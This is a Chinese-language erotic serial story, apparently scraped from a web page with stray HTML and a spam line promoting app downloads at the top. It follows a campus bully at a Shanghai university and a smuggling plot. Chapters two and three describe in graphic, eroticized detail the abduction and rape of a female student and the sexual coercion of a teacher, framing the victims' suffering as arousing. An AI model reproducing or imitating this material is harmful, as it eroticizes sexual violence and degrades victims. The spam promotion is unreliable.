<td id="loli0"><ruby id="loli0"></ruby></td>
    1. <table id="loli0"><ruby id="loli0"></ruby></table><big id="loli0"><strike id="loli0"><tt id="loli0"></tt></strike></big>

      以下APP站长已检测强烈推荐下载(狼友必备)

      上海女大生耻辱

        第一回 惡少江龍

      上海第二大學的學生社團中心。晚上九點半。

      三樓的“野人”酒吧里,坐著大約幾十個各院系的學生。這里是學校最受歡迎的酒吧之一,來這里的學生以一對對的情侶居多,當然也有許多單身的男生來這里碰運氣。而今天,他們確實飽了眼福。

      男生們偷偷摸摸或是大膽的色迷迷的目光,都集中到了酒吧最里面的一個角落,那里坐著兩男兩女。

      兩個女孩子是外文系的肖揚和梁婉儀,都是學校里男生BBS上選出的“上二大四大美女”之一。兩人都讀大二,且非常要好。兩個女孩的個頭也差不多,都是1米68左右的高挑身材,有著非常修長迷人的美腿。

      梁婉儀今天穿著短裙,白晰勻稱而曲線優美的長腿露在外面,令酒吧里的男生都情不自禁要多看兩眼。而肖揚則穿著緊身的牛仔褲,緊緊包裹著她的長腿和豐滿微翹的屁股。

      坐在她們身旁的男孩,一個是現在讀大三的法學院的學生會主席李浩,是肖揚的男朋友(他自然令別的男生妒忌得發狂);另一個是梁婉儀的高中同學,日文系的李柯,同高大英俊的李浩相比,他顯得有點猥瑣。

      “你真的答應同江龍比試?”李柯道。

      李浩點點頭。

      “浩,他是校長的侄子呀?!毙P充滿關切地望著李浩。

      “我知道,”李浩握住肖揚的纖纖小手︰“就是因為他仗著是校長的侄子而為所欲為,才應該壓壓他囂張的氣焰?!?br>
      “不過這小子也是不像話,才大一就這么狂!”李柯道。

      “我支持你?!绷和駜x優雅地交疊著兩腿,喝了口橙汁道︰“有什么了不起的,教訓教訓他!”

      “你看,有梁大千金小姐替我撐腰,你還擔心什么?”李浩笑著說。

      梁婉儀的父親梁益民是日本昌永財團在上海的中方總經理,這在學校里也早不是秘密,因為梁婉儀在高中的時候就替昌永財團的雅柔系列護膚品做過上海的形象代言人,她靚麗純美的形像已經幾乎成為了每個男市民的心中偶像了。

      肖揚依然是顯得很擔憂的樣子。

      就在這時候,一個穿得很酷的高大男孩走進了“野人”酒吧。酒吧里的學生立刻議論紛紛起來,因為進來的男孩就是“校長的侄子”°°現在新聞學院讀大一的江龍。

      江龍的身后跟著兩個打手模樣的人,這兩個人從初中開始就跟著江龍,他們沒考取高中,全靠江龍替他們安排工作,現在索性什么都不干,就跟著江龍,做他的死黨。

      江龍霸道地揀了個位子坐下,要了三杯飲料。他眼光色迷迷地掃了掃周圍的女生,很快便看見了角落里的肖揚、梁婉儀和李浩。江龍立刻吹了一聲很響的口哨,站起來朝他們走去,李浩也站了起來。

      酒吧立刻騷動起來,因為江龍同李浩約定在本周日單挑籃球的事早已經傳遍了全校。不僅因為李浩一直是上二大的籃球明星,更因為許多人看不慣飛揚跋扈的江龍,都希望李浩為大家出口氣。

      “希望到時候你不會嚇得不敢來??!”江龍虛假地大笑著說。

      “小子,不會讓你失望的!”李浩冷冷道。

      江龍眼睛從上到下地盯著肖揚色迷迷地看了一番,道︰“肖揚小姐長得可真迷人??!”

      “這與你無關?!崩詈拼舐暤?。

      江龍大笑起來︰“別激動,周日見!”說完帶著兩個打手離開了酒吧。

      李浩他們復又坐下。

      “真不是個東西!”梁婉儀道。

      “禮拜天有他好看的!”李浩輕蔑地說。

      四個人又說了一會兒話,肖揚起身去上洗手間。酒吧里的男生都目送肖揚邁著修長的雙腿翩翩地走出酒吧。李浩沒有覺得有什么不妥,而這后來被證明是極其錯誤的。

      第二回 強奸對手美麗的女友


      洗手間在走廊的另一頭,肖揚走過迪斯高舞廳和臺球房,就在她走到電梯門口的時候,電梯的門打開了。肖揚沒有去注意電梯里是誰,可是電梯里卻突然伸出一只粗大的手抓住肖揚的手臂,將她一把拉進了電梯。

      肖揚驚叫了一聲,但是卻被迪斯高舞廳里傳出的震耳欲聾的音樂淹沒了,李浩根本不可能聽見。

      肖揚被拉進電梯,立刻被一只手粗暴地摀住了嘴,然后一把冰涼的刀子架在了她白晰纖細的脖子上。肖揚從來沒有碰到這種事,嚇得花容失色,她看見除了制住自己的人外,另外還有一個人,那人按下了去七樓的按鈕。那是小電影廳,現在早已經結束了放映,應該沒有任何人了。

      學校的電梯里沒有裝監視器,兩個歹徒又有刀,肖揚真的不知道應該怎么辦才好,她只有拚命地盯著其中的一個歹徒看,希望能認出他或是記住他的樣子。這一看頓時讓肖揚充滿了涼意,因為她認出來,那個歹徒就是剛才跟在江龍身后的打手!難道是被江龍劫持了?

      電梯停在七樓,那里果然沒有人,兩個人架著肖揚將她押入放映廳里。穿過空無一人的一排排座位,肖揚被押進了放映機房里,機房里,一個男孩微笑地坐在那里,不是江龍又是誰。

      “歡迎肖揚小姐!”江龍色迷迷地看著因慌亂羞澀而更顯嬌俏的肖揚。

      “你……想干什么!”肖揚盡量裝出鎮定的樣子。

      “你說我想干什么呢?”江龍又發出了令人討厭的笑聲︰“李浩這個家伙很有種,居然想跟我斗,我很喜歡?!苯埪N起二郎腿繼續道︰“我就喜歡和人斗的感覺,喜歡戰勝對手的感覺,喜歡羞辱對手的感覺?!?br>
      “你最好馬上放了我,這里是學校,你別亂來!”肖揚微微顫抖地說。

      江龍并不理睬她,繼續說︰“李浩是個難得的對手,所以我要好好跟他斗一斗,慢慢折磨他、羞辱他。肖揚小姐,你說要是我搞了他的漂亮心愛的女朋友,他會氣成什么樣子?”

      “畜生,你太放肆了!”肖揚拚命掙扎,卻哪是江龍兩個膀大腰圓的打手的對手。江龍大笑著站起來,走到肖揚面前,伸手去摸她高聳的胸部。

      “別碰我!”肖揚嬌叱,無奈兩手被人制住,江龍的手隔著衣服一把捏住了她的乳房。肖揚又羞又憤,她知道被自己男朋友的對手污辱會令江龍有多大的快感,又會令李浩多么恥辱和痛苦,所以嬌弱的她使盡了力氣掙扎??墒遣还芩趺磁铀膵绍|,江龍的手依然自如地摸弄她的乳房。

      肖揚羞澀難當,抬起修長的玉腿朝江龍蹬去,江龍早已經料到,側身一閃,然后伸手捉住了肖揚纖細的腳踝,他手使勁向上一舉,肖揚便被迫高高地抬起了她的一條長腿。像肖揚這樣溫柔的少女,雖然是憤怒地攻擊卻也是優雅得無力,此刻被江龍輕松地捏住腳踝高分著玉腿,更加顯得嬌美動人。

      “放開我!”肖揚漲紅了臉,掙扎著擺動她的長腿。

      江龍滿足地看著肖揚掙扎了一會兒,然后他放下了肖揚的腿,欺近肖揚的身前,這樣肖揚便無法使力踢他。江龍伸手到肖揚的纖腰去解她的皮帶。

      “不要,求你了,不要!”意識到掙扎不過三個男人的肖揚終于開口哀求。

      江龍當然不會停手,他熟練地解開皮帶,然后一下子將肖揚的緊身牛仔褲和白色的小巧內褲一齊剝到了腳踝處。頓時,一雙光滑白晰、曲線優美的長腿便裸露在了江龍的面前。

      “畜生!”肖揚絕望的嬌叫,拚命夾緊兩腿。

      江龍欣賞著肖揚的美腿和下腹部的一撮黑色的恥毛,“太美了!”江龍贊嘆道︰“真不愧是我們學校的四美之一??!”

      “不要……求求你!”肖揚哀求。

      “我見過那小子打球,”李浩對李柯說︰“他動作很花,可是并不實用。星期天一定打得那小子討饒?!崩詈谱鰤粢矝]有想到,此刻他嬌美可愛的女朋友卻正在向他的對手討饒。

      “唰唰”幾下,江龍的手下便將肖揚的衣褲全部剝去,美女肖揚終于赤身裸體!

      “畜生!救命??!浩,救我!”肖揚哀叫掙扎。

      江龍使個眼色,他手下放開了肖揚,掙脫了的肖揚下意識地向門口逃去,才發現自己一絲不掛。原來淫棍江龍就是想欣賞修長的肖揚裸體奔逃的美妙景像,肖揚的雙腿又長,屁股又翹翹的,哪怕是奔逃起來也是優雅無比,更何況她還羞澀地刻意夾緊玉腿,更顯得撩人。

      肖揚跑到門口,門當然鎖住。她絕望地看著江龍逼來。

      “江龍,你會后悔的!”肖揚哀叫。

      “打籃球其實最重要的是跑動,要積極地跑動……”李浩向李柯解釋。

      “畜生!”美麗的肖揚絕望地在放映室狹小的空間里“積極”地跑動,躲避著故意不捉住她的惡少江龍??墒菄樀没ㄈ菔男P并沒想到,她這樣裸露著迷人的玉體在江龍面前奔逃,其實令江龍得到更大的快感。

      江龍滿意地看著學校里出了名的長腿美眉肖揚裸露著修長玉腿奔逃著,豐滿的胸部隨著身體的起伏而撩人地晃動。

      玩夠了以后,江龍叫手下捉住肖揚。

      “放開我,你這個混蛋!”被重新捉住的肖揚嬌叱。

      “肖揚小姐,現在,就讓我來欣賞一下李浩同學那嬌美無比的女朋友的身體吧!”江龍淫笑說。

      “你敢!”肖揚夾緊了玉腿。

      江龍向手下使了個眼色,兩人會意,各使力氣將肖揚轉過身,然后一踢她的后膝,肖揚便被迫跪倒在地上,然后按下肖揚的頭,這樣,肖揚的裸露的屁股就被迫高高地撅了起來,她一直夾緊玉腿想保護的那胯間的粉紅色的肉縫和菊花蕾也都無奈地張了開來。

      “江龍,你是畜生!”被弄成如此羞恥姿勢的肖揚羞憤欲死,淚水終于從她美麗的眼睛里奪眶而出。

      “哈哈哈,打得那小子跪地痛哭!”李柯說道。

      “對!讓那小子跪地求饒!”李浩躊躇滿志地說。他哪里知道,此刻自己心愛的女友肖揚卻跪在“那小子”面前,把她最神圣隱秘的羞處毫無遮掩地露給了他看。那里就連他都沒有看到過,肖揚最多只在夏天她穿迷你短裙的時候讓他把手伸進她的內褲里去過。

      “畜生!”肖揚含淚嬌叱。

      江龍的兩個手下跟隨江龍多年,許多事早就駕輕就熟,兩人將肖揚按倒在地上,分別在兩邊,各用一手將肖揚的玉手扯開,又各用一手捉住肖揚的腳踝,將肖揚兩條長腿分成超過120度。

      江龍淫笑著,趴在肖揚分開的兩腿間︰“怎么樣,肖揚小姐,現在有什么感想,即將被自己男朋友的敵人強奸?”

      “不要,求你了,啊……??!”肖揚絕望地叫,因為江龍已經伸手逗弄她的兩顆粉紅色的乳頭。

      肖揚咬緊嘴唇,無奈地任由江龍玩弄她的身體,不一會兒,她的乳頭便硬了起來,可憐她只被李浩撫摸而硬起來過的乳頭,竟然今天被這個惡棍弄得硬了起來。江龍于是兩手下行,探入肖揚的胯間,撥開了她的兩片陰唇,又開始老練地逗弄她的陰蒂。

      肖揚自然對眼前這個校園惡少討厭之極,可她畢竟是個21歲的青春少女,被江龍這么有經驗的老手逗弄她最敏感的地方,還是不可避免地產生了一種生理上的快感。

      “不,不!”肖揚絕望地喊,可是那花瓣里還是不爭氣地流出了蜜汁。

      這正是江龍期待的︰“要是李浩知道他心愛的女友被我搞硬了乳頭,搞出了蜜汁,不知道會氣成什么樣子!哈哈哈哈!”

      兩個打手也在旁邊陪著干笑。

      江龍拉開褲子拉鏈,終于掏出已經堅挺的粗大無比的肉棒。他用兩個大拇指將肖揚的肉縫撐到最圓,然后將大雞巴捅了進去。

      “浩,救我……”肖揚淚流滿面,終于絕望地喊著李浩的名字︰“啊……啊……啊……啊……”

      江龍帶著無比的滿足,將他碩大的陰莖插入了肖揚處女的陰道的深處……

      “那混蛋如果想進步一些的話,”李浩對李柯說︰“應該去練連腰腹力量,這樣才能做好空中動作……”

      江龍使出“腰腹力量”極爽地在肖揚緊繃的處女的陰道里抽插,終于被辱,還被奪去了處女貞潔的肖揚羞憤欲死,加上是第一次,疼痛異常,所以立刻神智模糊,幾乎昏去。

      江龍狂干猛插了約十多分鐘,終于感到一陣極度的快感襲來,他將大雞巴拔出,迅速跨騎到肖揚的胸口,將神志模糊的肖揚的櫻桃小嘴扒開,把雞巴捅了進去。

      “啊……啊……啊……”隨著一陣快樂的號叫和抽搐,校園惡少江龍將一股污濁的精液全部射入了學校無數男生夢中情人的美少女肖揚的嘴巴里。肖揚在迷糊中感到一股灼熱的液體直沖喉嚨,她無奈地喝了下去,喉間痛苦地發出了“咕咚咕咚”的聲音。

      “咕咚咕咚”李浩滿意地一口氣將一杯西柚汁喝下。

      “肖揚怎么去了這么久,有半個小時了吧?”梁婉儀道。

      “應該不會有事吧?”李浩說。

      “我去洗手間看看吧!”梁婉儀起身。

      就在這時,面色蒼白的肖揚走了進來。酒吧里的男生照例貪婪地目送,他們當中有的人發現肖揚的長腿似乎沒有出去時擺動得那么優雅自然,當然他們并不會想到是因為眼前這個嬌美的玉人剛剛被個惡少破了處女之身的緣故。

      “你臉色不好,沒事吧?”李浩關切地問。

      “沒……沒什么?!毙P勉強地一笑,說。

      李浩料想是什么婦科病癥,也不好多問,梁婉儀應該會去關心的。

      “那我們早點回去吧!”梁婉儀挽住肖揚道。

      李浩點點頭。

      四人于是結了帳,離開了“野人”酒吧。

      李浩將肖揚和梁婉儀送到了寢室門口,便自己回了寢室,他并沒有注意到李柯并沒有回他的寢室。

      第三回 更大的陰謀

      晚上十點半,學生社團中心大樓依然亮著燈,七樓放映廳里,江龍和他的手下坐在那里,江龍依然回味著剛才奸污肖揚的美妙感覺。

      門開了,李柯領著一個中年男人走了進來,江龍站了起來。

      “這位王先生是山本先生最信任的人?!崩羁掠懞玫叵蚪埥榻B。

      江龍點點頭,和王先生握了握手以后坐下。

      “我馬上就走,所以就開門見山吧!”王先生用一種刺耳的聲音說道︰“山本一郎先生是日本昌永財團董事長山本村正先生的獨子,對中國的古董文物一直非常感興趣。他在陜西和北京等地與許多中國朋友都合作得很好,現在山本先生對上海博物館現藏的大禹權杖這件古董非常感興趣,希望能夠得到。山本先生了解到,上海博物館館長的千金徐倩小姐就在上二大讀書,聽說江龍先生對小妞挺有辦法……”王先生說到這里干笑了一聲。

      “承蒙山本先生夸獎,”江龍也干笑了幾聲道︰“請王先生轉告山本先生,他的意思我懂了,我會全力去辦的!”

      “好,不愧是明白人!”王先生怪叫道︰“事成之后,山本先生不會虧待你們的!”

      王先生說完便起身告辭,江龍送至門口。

      “這個徐倩,是不是也是上二大的四大美女之一???”王先生走后江龍問李柯。

      李柯點點頭︰“她是我的同班同學,還是我們學校有名的‘青春勁舞’組合的成員之一,身材極棒,舞跳得更好?!崩羁抡f得眉飛色舞。

      “他媽的,你是不是每天晚上想著她手淫???”江龍嘲諷地說。

      “有……有時是?!崩羁骡嵉爻姓J。

      “有時是,那別的時候呢?”

      “別的時候,嗯,有時想著肖揚,有時想著梁婉儀……”

      “哈哈哈哈……”江龍狂笑︰“剛才李浩覺察到了什么沒有?”

      李柯搖頭。

      “哈哈哈哈,蠢貨,老婆被我搞了都不知道,還跟我斗!”江龍無限滿足地大笑︰“對了,酒吧里還有個女孩就是梁婉儀吧?”

      李柯點頭。

      “漂亮,真他媽的漂亮!老子一定要把她弄到手!”

      “這妞可傲了,學校里追她的人有無數,可是她一個都看不上,他老爸有的是錢……”

      “嘿嘿,我就喜歡搞高傲的美女?!苯埩髦谒f。

      “對了,老大,你昨天跟我說的事……”李柯露出丑陋的淫笑。

      “瞧你這臭小子,急什么,馬上讓你小子爽?!苯埖?。李柯露出迫不及待的表情。

      學生社團中心關門的時間是十一點,每晚都由某個院系的輔導員來最后監督檢查。今天有許多男生都賴在臺球室、舞廳、野人酒吧等地方遲遲不走,因為今天來監督檢查的是文學院的輔導員兼任校團委副書記的林維維老師。

      林老師今年25歲,是文學院剛剛畢業的研究生。她的本科就是在上二大讀的,當時是上二大出了名的?;?,現在不僅美貌依舊,更加多了幾分成熟女人的誘人風姿,令上二大老師學生全都垂涎不已。

      十一點整,身高1米70、修長苗條的林維維老師準時來到社團中心。她沒有讓等在那里的饑渴的男學生失望,她穿了一套黑色的緊身套裙,美腿上穿著黑色的長絲襪,顯得無比撩人。她邁著舞姿般的步伐在中心指揮學生干部做最后的檢查,然后用嬌美迷人的嗓音催促那些不離去、色迷迷看著她的學生回寢室。

      終于,全部學生都戀戀不舍地走了,林維維老師檢查了各個單元的門后卻并沒有像往常那樣鎖了大門離去,而是坐上電梯到了7樓。

      她翩翩地走進放映廳,見到了江龍和他的手下。剛才在學生面前高高在上的林老師,站在大一的江龍面前卻突然變得順從和羞澀。

      “你……快一點?!彼p聲說。

      “這你得跟他說?!苯堉噶酥咐羁?。

      林維維老師這才注意到李柯的存在,她立刻漲紅了臉︰“他……是我們學校的學生嗎?”

      江龍點頭。

      “不……不行?!绷志S維老師哀求。

      “林老師,你忘了你沒有選擇的機會,”江龍冷冷道︰“我讓你伺候誰,你就得伺候誰?!?br>
      林維維老師站在那里,羞得滿臉通紅,她猶豫了片刻,終于順從地走到1米65的矮小猥瑣的李柯面前,跪了下來。李柯立刻聞到林老師身上散發出來的一股芳香,令他無比興奮。他看著自己一直只能在夢里想像的美麗女老師竟然真的跪在自己面前,幾乎要暈過去。

      林維維老師伸出白嫩的手,拉開了李柯骯臟的褲子的拉鏈。林老師的溫熱的手摸到李柯那個硬挺的物件,將之掏出來的時候,李柯渾身一抖。

      “林老師,你真的肯舔我的雞巴!喔,太好了!”李柯興奮地歡叫著︰“林老師,我經常在晚上睡覺前想像著搞你的情景,沒想到你真的……哈哈哈哈……啊啊……啊啊……”李柯突然狂叫起來,原來美麗的女老師已經用她的嘴含住了李柯的肉棒。

      林維維老師聞到一股濃重的尿味,幾乎嘔吐,可她還是順從地伸出舌頭,舔舐李柯骯臟的性器。

      梁婉儀從上鋪下來,坐到肖揚的床上,淚流滿面的肖揚轉頭朝向墻壁。

      “發生了什么事?”梁婉儀柔聲問。

      “啊……啊……林老師,我要看你的裸體,啊……啊……啊……”李柯爽得直嚎。

      林維維老師含著李柯的雞巴,轉頭看了看江龍,“按他說的做!”江龍冷冷道。林維維老師無奈地一邊叼著李柯的陰莖,一邊脫下自己的套裙。

      “啊……林老師……你的身體好美,啊……啊……你的乳房真大,啊……啊……喔……爽死了,林老師你的美腿真長……”

      林維維老師順從地裸了玉體,一絲不掛地替一個學生口交。

      “我要搞老師,我要強奸老師!”

      “什么!你被他強奸了?!”女生寢室的走廊里,梁婉儀輕聲驚叫。

      肖揚痛苦地點點頭。

      “爽死啦!”李柯伸出手撥弄著林維維老師飄逸的長發和她精巧可人的小耳朵。為了早點結束的美麗女老師,賣力地吸吮著李柯的性器,發出“嘖嘖”的聲音。突然李柯大叫一聲,一股精液終于泄到了美麗女老師的嘴里。

      “什么!他還……畜生!”梁婉儀罵道。

      “我也不知道,醒來后,滿嘴都是男人的那東西?!毙P泣不成聲︰“千萬不能讓李浩知道啊……”

      “畜生!”梁婉儀抱住肖揚︰“一定不讓這個混蛋有好日子過!”

      林維維老師羞澀地穿上美麗的套裙,李柯躺在地上,臉上定格著爽到極點的呆滯表情,嘴里喃喃道︰“林老師吮了我的雞巴,林老師吮了我的雞巴……”

      第四回 輸給強奸了自己女朋友的惡少

      周日是一個秋高氣爽的日子。下午一點半,上海第二大學無數的同學已經聚集在東區體育館里。因為今天在這里將有一場李浩對江龍的籃球單挑,比賽是半場,先進10個球者為勝,擔任裁判的是校體育組的陳教練。

      江龍已經站在了場內,頗為賣弄地進行著練習,而李浩卻還沒有到。

      學校的“梅園”里,李浩和肖揚正穿過小徑向體育館走去。

      李浩默默走在肖揚的身后,他望著美麗修長的女友,數次欲言又止,終于,他下了決心,問道︰“揚,剛才我碰到江龍那個混蛋,他他媽的說了些污辱你的話,要不是就在校長室旁邊,我真想揍他!”李浩說。

      肖揚默默不語,繼續走著。李浩心中一沉。

      “他說他……欺負了你,”李浩說︰“楊,沒這回事吧?”

      “當……當然沒這回事,”肖揚躲閃著說。

      李浩看出了肖揚的猶豫,“揚,你告訴我實話,揚!”李浩追問。

      “浩!”肖揚終于忍不住淚水奪眶而出,撲到了李浩的懷里︰“那畜生強奸了我……”

      “什么!那……那畜生怎么會……欺負你的?!”李浩顫抖地說。

      “那天在社團中心,我去洗手間,他的手下把我劫持到電影廳……他把我的衣褲脫光,看我的身體,還奸污了我……”

      “畜生!”李浩聲嘶力竭地怒嚎。

      “他還把那東西插到我嘴里……”肖揚泣不成聲。

      “我殺了他!”李浩大叫。

      “浩,別亂來!”肖揚拉住他。

      “我們去告他,讓他坐牢!”

      “他,家里很有勢力的,浩,我不要別人知道這事,浩,求你了,別讓別人知道……”

      望著嬌美動人,楚楚可憐的肖揚,李浩抱住她痛苦地點頭……


      人群轟動了,李浩終于出現在了體育館里。

      梁婉儀是第一個注意到李浩反常的,別的人也很快發現了。

      “沒這么夸張吧,一場比賽,他好像要殺人似的?!庇腥俗h論。

      李浩鐵青著臉走到江龍面前,江龍得意無比地朝他示威地笑。

      裁判一聲哨響,球拋向空中。

      觀眾們立刻失望了。李浩打得那是什么球啊,太臭了,簡直和平時是判若兩人。

      他們哪里知道,李浩一看到江龍那張牙舞爪運球,跳躍的樣子,就想到這個畜生曾經剝下他心愛的女朋友的衣褲,貪婪地觀賞她的羞處,肆意地摸弄她的生殖器官……天啊,這是多么讓人心痛的事??!肖揚這么楚楚動人,純潔美麗的少女,竟然被眼前這個惡少污辱了!李浩拚命想將腦中的這些念頭驅除,可是他做不到,他不可遏制地想著江龍用他骯臟的手沿著肖揚白晰的腿剝下她的緊身牛仔褲的鏡頭、江龍將他粗大的性器插入肖揚處女的陰道的鏡頭……

      十分鐘后,李浩輸了個0︰10。觀眾哄笑著搖頭散去,不少人竟然開始稱江龍為“上二大新球王”了。

      江龍看著緊握雙手的李浩,輕聲說︰“我插進她那里的時候,她還叫你的名字呢!”

      “畜生!”李浩號叫著憤怒地沖過去揍江龍。江龍馬上抱著頭逃開,許多人拉開李浩。

      “輸了球不必打人嘛!”更有人輕蔑地說︰“這么輸不起,真丟人!”

      “畜生!我殺了你!”李浩掙扎著朝著站在一邊微笑的江龍怒吼,直到嗓子沙啞,昏死過去。

      江龍滿意地看著昏厥過去的李浩被人抬走,突然聽見背后一個嬌美動聽的聲音響起︰“你別得意,有種的再跟我比比!”

      江龍回頭,只見一個穿著短裙的修長美少女亭亭玉立,正是梁婉儀。

      “哈哈哈哈!”江龍大笑︰“梁小姐這么纖美溫柔的姑娘也會打籃球?”

      “誰說籃球了,你敢跟我比網球嘛?”梁婉儀道。

      “行行行,跟梁小姐這樣的美人比什么都行!”江龍望著貌美絕倫,氣質萬千的梁婉儀口水都要流出來了。

      “那跟我來?!绷和駜x說完轉身就走,江龍貪婪地望著梁婉儀露在短裙外的美腿,連忙跟上。

      梁婉儀突然停下道︰“我看著那兩人討厭,別讓他們跟來?!?br>
      江龍哪會放過這么個同梁婉儀接觸的機會,道︰“你們回去吧!”兩個打手離去。

      梁婉儀邁開雙腿,優雅萬千地走出體育館,江龍緊緊跟隨,目光不離梁婉儀的下半身,那短裙隨著梁婉儀的步伐微微搖擺,幾乎要露出大腿的根處,卻又實際上什么都看不到。江龍恨不得鉆到梁婉儀的裙子里去。

      江龍跟著梁婉儀不知不覺走到了舊食堂的后面,那里什么人都沒有。江龍發覺不對時,已經從不知道哪里閃出了兩個大漢,二話不說就朝江龍招呼。江龍狼狽鼠竄,還是被打得哇哇大叫。

      “畜生,罪有應得!”梁婉儀嬌叱。

      “梁小姐饒命,我不敢了!”江龍大叫。

      “呸,叫你欺負肖揚,狠狠揍他!”

      兩個大漢拳如雨點,江龍頓時鼻血橫流。

      “饒命啊,饒命??!”江龍號叫。

      “有人來了!”其中一個大漢說。

      “走吧!”梁婉儀道。她塞了一把錢到二人手里,兩人便迅速離去,梁婉儀也離開。

      江龍從地上爬起來,抹了一把嘴角和鼻孔旁的鮮血,惡狠狠地望著梁婉儀俏麗的背影道︰“臭妞,別落到我手里!”

      第五回 美麗的警花

      晚上八點,上海第二大學學生活動中心一樓的多功能廳里燈火通明。在強勁的音樂的伴奏下,三個有著魔鬼身材的高挑少女正在跳著現代舞。臺下,有幾個人正在觀看。隨著音樂嘎然而止,三個少女來了個漂亮的造型結束了舞蹈,臺下響起了掌聲。

      “真不愧是‘青春勁舞組合’,這次在學校文化節上表演一定又會引起轟動的!”說話的男生是校學生會副主席陳卓。

      “中間的那個動作是不是有點不連貫?”站在陳卓旁邊一個穿著短裙,極美麗的少女說。她是校文藝部長上官敏。

      “是這樣的,我們有一個動作還在設計中,所以剛才沒跳出來。待會兒我們跟婉儀一起商量一下?!迸_上一個同樣高挑迷人的女孩從臺上跳下來說。她是徐倩。

      “對了,這次多虧你爸爸贊助我們的活動?!标愖繉φ驹谏瞎倜羯磉叺牧和駜x道。他說出這話有點后悔,因為這明顯是沒話找話。本來今天的排練他是沒必要到場的,他來,其實只是聽說梁婉儀會來而已。

      梁婉儀沖他溫柔地一笑。陳卓一直追求她對她來說已經不是秘密了,但是追求者可以裝幾車廂的梁婉儀似乎還沒對誰找到感覺。

      這時候,李柯從舞臺旁邊的音響控制室里走出來,道︰“今天要是肖揚也來了,那我們上二大的四大美女可就到齊了!”

      大家也才發現今天難得是美女云集。梁婉儀,徐倩,上官敏三個美女相視一笑。

      這時廳后的門推開,走進來兩個人。一個是校團委副書記林維維老師,另一個卻是江龍。

      大家看到江龍,都有些反感,大家都對這個惡少挺不屑。梁婉儀則因為他強奸了自己的好朋友則更加鄙視他。雖然自己雇人教訓了他,但是卻又怎能彌補肖揚身心受到的傷害呢?

      江龍掃了一眼廳內的人,心道怎么我想玩而沒玩到手的小妞今天都來了。上二大鼎鼎有名,才貌雙全的上官敏果然名不虛傳,剛跳完舞的徐倩高聳的胸部正一起一伏,而梁婉儀則盯著他臉上的傷痕得意地冷笑,她那種高傲又嬌美的神情撩撥得江龍恨不能馬上就剝光了她搞得她嗷嗷嬌叫。

      “臭妞,你先得意吧,總有一天落到我手里!”他暗暗說。

      林維維老師則立刻面紅耳赤,因為她看見李柯正沖她得意地淫笑。她想起那晚在七樓替他口交,又裸了身體給他看的羞人情景。

      “這位是江龍同學,他現在已經加入了我們團委工作,他中學里也是文藝骨干,所以這次文化節,就由他代表團委和學生會合作主持吧!”林維維老師說︰“希望大家配合江龍同學搞好工作?!?br>
      陳卓,上官敏當然反對,大家都明白,校學生會歷來是在校團委的直接領導下的,這次團委竟然派江龍為代表,實際上就是要江龍來負責。他們都得聽江龍的,這他們當然不福氣,可是他們知道林維維只是團委里普通的老師,這并不是她的意見,一定因為江龍是校長的侄子,所以團委想巴結他??墒撬麄冇侄紵o法公開反對,所以只有沉默不語。

      林維維老師說完便離開,她實在不想見到那個猥瑣矮小的男生的淫蕩目光。李柯見林老師離去,忙問︰“今天的排練結束了吧?”

      “我們還要討論一下,不過用不著音響了?!鄙瞎倜舻?。

      “你可以回去了!”江龍道,他知道李柯的心思。李柯大喜,立刻沖出了多功能廳,去追林維維老師。

      陳卓,上官敏看到江龍一副發號施令的樣子都很厭惡,梁婉儀更是氣憤。

      “好,我們討論一下晚會的事吧!”江龍說。

      “我還有事,先走了?!绷和駜x冷冷地說道。

      “我還要去宣傳部開個會,我也走了?!标愖康?。

      “既然這樣,今天就散會吧!”上官敏說完理了東西也離開。江龍目送著三人離開咬牙切齒。

      徐倩她們三個聽見上官敏的話,也準備理東西走人。江龍只有尷尬地說道︰“那……今天就到這里,你們三人誰主跳?”

      兩人一指徐倩,“那你留一下?!苯堈f。

      徐倩不是學生會干部,也不知江龍底細,自然不像梁婉儀她們那么不給江龍面子,于是留下。

      “你們還缺少什么道具嗎?”江龍問。

      “嗯,我們想換個伴奏音樂,想用個前衛點的音樂,卻找不到合適的,我們本來就沒什么這方面的磁帶?!毙熨徽f。

      “我有,我有,”江龍忙說︰“我教室里有許多前衛音樂的磁帶,你跟我去拿吧?!?br>
      徐倩哪里知道有陰謀,欣然同意。他們走出多功能廳,路過道具室時,聽到里面似乎有聲音,江龍暗暗一笑。徐倩也沒多想,她哪里料得到,里面林維維老師正在替李柯口交!

      江龍故意帶著徐倩走近路。那是過學校舊食堂的那條路,也就是梁婉儀派人揍他的那個地方。

      那里十分僻靜,幾乎沒有人在那里。

      兩人走到那里時,突然竄出兩個面人撲向徐倩。

      “??!”江龍馬上假裝被打倒,兩人往徐倩嘴里塞上毛巾,便準備架走。徐倩一個嬌弱女孩,自然沒得反抗。正在這時,突然沖出一個俏麗矯健的身影,連續兩個踢腿準確地踢開了兩個面人,面人立刻反擊。江龍一驚,隨即拉起徐倩道︰“快跑!”

      徐倩早嚇得不會思考了,跟著江龍就跑,根本不辨方向,不知不覺跑到校園西面的圍墻處,突然一只麻袋罩了過來……

      舊食堂處,矯健的身影獨斗兩個面人,卻仍占了上風。兩個面人相互一看,便準備逃走。這時,十幾名警察從四面出現,立刻捉住了兩個面人。

      警察們將面人帶到路燈下,扯下他們的黑布,露出兩個日本人的臉。

      “陳警官,正是西村和小林!”警察們報告。

      剛才那個俏麗的身影走了過來,竟然是個極美麗的女警官。

      “西村,小林,我們又見面了!”女警官說。

      “是……你,又是你?!蔽鞔孱澏吨f。

      這位美麗苗條的女警叫陳茹,是北京的警官,以優異的成績畢業于中國警官大學。雖然今天只有24歲,卻連破大案,令犯罪份子聞風喪膽。加上她貌美如花,一直是警界里的嬌女。她追蹤山本走私集團已經三年,多次阻止了他們偷運國寶,可是因為山本有日本財閥的支持,加上一直無法找到直接證據,所以始終無法將他們逮捕。這次,她得到可靠線報,說山本他們要對上海博物館的文物下手,所以她就追蹤到了上海。

      “報告陳警官,那個女孩不見了!”

      “什么?”


      上海一套豪華別墅的地下室里,站著三個男人。地上,躺著一個手腳都被麻繩捆起來的美麗少女,她正是上海博物館長的女兒徐倩。

      三個男人是山本一郎,王先生和江龍。

      “這次多虧了江先生機智??!”久居中國的山本操著流利的中文道。

      “哪里哪里!”江龍客氣︰“不是山本先生的兩位朋友會有什么麻煩?”

      “不要緊,我們只要不讓他們找到這個女孩,他們就沒有證據的?!鄙奖菊f道。

      “那個美麗的女警察是什么樣的來頭?她后來把我叫去盤問,看得出,她很干練?!苯埖?。

      山本臉上露出冷笑︰“不錯,她比你想像得還要干練。她是我在全世界遇到的最大的對手。她的父親也是警察,死在我手里,所以她一直想抓住我,替她父親報仇!”

      “原來是這樣!”江龍說。

